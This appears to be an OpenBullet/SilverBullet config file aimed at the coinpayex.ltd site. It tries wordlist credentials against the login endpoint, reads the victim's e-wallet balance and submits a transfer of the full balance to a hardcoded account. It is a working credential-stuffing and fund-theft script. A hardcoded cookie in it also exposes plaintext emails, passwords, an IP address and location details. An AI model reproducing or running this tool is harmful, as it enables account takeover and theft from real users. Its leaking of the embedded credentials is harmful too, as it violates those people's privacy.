[SETTINGS]
{
  "Name": "coinpayex.ltd",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-27T14:07:28.8889084+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "coinpayex",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Constant "0x7rXpmeqDj6Ky39l1F4aigBkQJRfwWGchuYZASVsH" -> VAR "1" 

REQUEST POST "https://coinpayex.ltd/user/auth/login" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry entered username/password is wrong" 
  KEYCHAIN Success OR 
    KEY "Dashboard" 

REQUEST GET "https://coinpayex.ltd/user/ewallet/viewEwalletBalance" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<h3 class=\"no-margin\">" "</h3>" CreateEmpty=FALSE -> CAP "Balance" 

REQUEST POST "https://coinpayex.ltd/user/ewallet/ewalletFundTransfer" Multipart 
  
  STRINGCONTENT "username: <1>" 
  STRINGCONTENT "amount: <Balance>" 
  STRINGCONTENT "btn: submit" 
  BOUNDARY "------WebKitFormBoundary16yElr8jv2CVsfAQ" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 341" 
  HEADER "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRlLs2dvTYbFW7eLh" 
  HEADER "Cookie: addevent_track_cookie=5e74a43c-f325-4194-a50e-86d6f9b959cd; cf:aff_sub2=; cf:aff_sub3=; cf:aff_sub=; cf:affiliate_id=; cf:cf_affiliate_id=; cf:content=; cf:medium=; cf:name=; cf:source=; cf:term=; cf:visitor_id=36c4e900-218c-4bf1-96e9-d6555947cab9; ci_session=a%3A13%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22c534214c4066e4cc316892e62378d748%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2279.101.157.105%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F96.0.4664.55+Safari%2F537.36+Edg%2F9%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1638018130%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22registration_info%22%3Ba%3A2%3A%7Bs%3A24%3A%22sponsor_and_account_info%22%3Ba%3A8%3A%7Bs%3A6%3A%22ref_id%22%3Bs%3A6%3A%22123456%22%3Bs%3A13%3A%22ref_user_name%22%3Bs%3A22%3A%22coinpayex%40coinpayex.io%22%3Bs%3A8%3A%22username%22%3Bs%3A23%3A%22ilikepoop4042%40gmail.com%22%3Bs%3A5%3A%22email%22%3Bs%3A23%3A%22ilikepoop4042%40gmail.com%22%3Bs%3A6%3A%22pkg_id%22%3BN%3Bs%3A10%3A%22pkg_amount%22%3BN%3Bs%3A8%3A%22password%22%3Bs%3A10%3A%22ilikeass11%22%3Bs%3A6%3A%22t_code%22%3Bs%3A10%3A%22ilikeass11%22%3B%7Ds%3A13%3A%22personal_info%22%3Ba%3A8%3A%7Bs%3A10%3A%22first_name%22%3Bs%3A11%3A%22poopsnake69%22%3Bs%3A9%3A%22last_name%22%3Bb%3A0%3Bs%3A10%3A%22contact_no%22%3BN%3Bs%3A7%3A%22country%22%3Bs%3A2%3A%22RS%22%3Bs%3A5%3A%22state%22%3BN%3Bs%3A4%3A%22city%22%3Bs%3A8%3A%22Belgrade%22%3Bs%3A13%3A%22address_line1%22%3BN%3Bs%3A13%3A%22date_of_birth%22%3BN%3B%7D%7Ds%3A8%3A%22username%22%3Bs%3A18%3A%220026n1zm%40gmail.com%22%3Bs%3A8%3A%22password%22%3Bs%3A8%3A%22xd4380Nz%22%3Bs%3A8%3A%22userType%22%3Bi%3A2%3Bs%3A4%3A%22auth%22%3Bb%3A1%3Bs%3A12%3A%22SD_User_Name%22%3Bs%3A18%3A%220026n1zm%40gmail.com%22%3Bs%3A7%3A%22user_id%22%3Bs%3A10%3A%22CPE4427335%22%3Bs%3A17%3A%22userpanel_user_id%22%3Bs%3A10%3A%22CPE4427335%22%3B%7D96f3f24b229c93007b0b32da28fd78811b536187" 
  HEADER "Host: coinpayex.ltd" 
  HEADER "Origin: https://coinpayex.ltd" 
  HEADER "Referer: https://coinpayex.ltd/user/ewallet/ewalletFundTransfer" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Microsoft Edge\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34" 

